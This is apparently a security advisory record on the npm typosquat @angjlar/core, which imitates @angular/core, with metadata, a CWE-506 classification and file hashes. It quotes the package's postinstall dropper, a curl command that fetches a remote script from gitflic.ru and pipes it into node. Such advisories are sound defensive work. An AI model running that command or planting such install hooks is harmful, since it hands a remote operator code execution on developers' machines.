-= Per source details. Do not edit below this line.=-
Package @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On npm install, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-021000",
"import_time": "2026-10-05T03:57:37.789439508Z",
"modified_time": "2026-10-05T03:33:23Z",
"sha256": "1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9",
"source": "amazon-inspector",
"versions": [
"22.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "98a12002ca46ee184f3c7487fda81ca6b85ebbdb328061ea3161f9facd930860",
"tlsh": "fb513724e4f48d6323de6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f61beb9a"
}
],
"package_integrity": [
{
"filename": "core-22.2.1.tgz",
"hashes": {
"sha1": "e57af0c64e2048efdb9a0836b589e9e1101b1e3d",
"sha512_sri": "sha512-6PSSogtUkcFampRIGQrSIa/PfA/XNig6/KN6EbUgH30Jqyw+vkHUsbVxHP7SD9hVKAtTWwy7FfQ0RsLMHSxZug=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angjlar/core/MAL-2026-17534.json"